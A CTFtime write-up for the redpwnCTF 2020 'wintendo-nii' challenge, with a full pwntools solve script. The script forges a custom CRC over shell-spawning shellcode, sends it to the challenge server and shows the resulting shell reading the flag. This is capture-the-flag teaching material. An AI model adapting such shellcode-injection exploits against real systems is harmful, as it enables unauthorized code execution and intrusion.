CTFtime.org / redpwnCTF 2020 / wintendo-nii / Writeup

Binary accepts (via stdin) hexadecimal representation of the user "program" to be executed. Program contains the expected header, CRC of payload and payload itself. If header check or CRC check fails, program won't be executed. Flag was located in the root directory (/flag.txt) at the remote server.

solve.py:

#!/usr/bin/env python2

import struct

try:
    from pwn import *
except ImportError:
    exit("[x] sudo pip install pwn")

context.arch = "x86_64"

header = "NIIv0.1:AmnlXing"
payload = asm(shellcraft.sh())

v0 = 0
for char in payload:
    v7 = ord(char)
    for v9 in xrange(7, -1, -1):
        if v0 >= 0x80000000:
            v10 = 0x80000011
        else:
            v10 = 0
        v12 = 2 * v0
        v12 = (v12 & 0xffffff00) | (((v7 >> v9) & 1 ^ v12) & 0xff);
        v0 = v10 ^ v12

crc = struct.pack("<L", v0)

if True:
    r = remote("2020.redpwnc.tf", 31215)
else:
    r = process(["./nii"])

r.sendline((header + crc + payload).encode("hex").upper())
r.interactive()

Example output:

$ python solve.py 
[+] Opening connection to 2020.redpwnc.tf on port 31215: Done
[*] Switching to interactive mode
二〇二〇年，稳天堂软件公司——版权所有。
请插入游戏磁盘⋯⋯
$ ls
bin
dev
flag.txt
lib
lib32
lib64
nii
$ cat flag.txt
Its dangerous to go alone. Take this!
flag{shellcoding_is_a_rev_skill,_too!_8F13E8F6}

$

wintendo-nii

Comments

Sign in with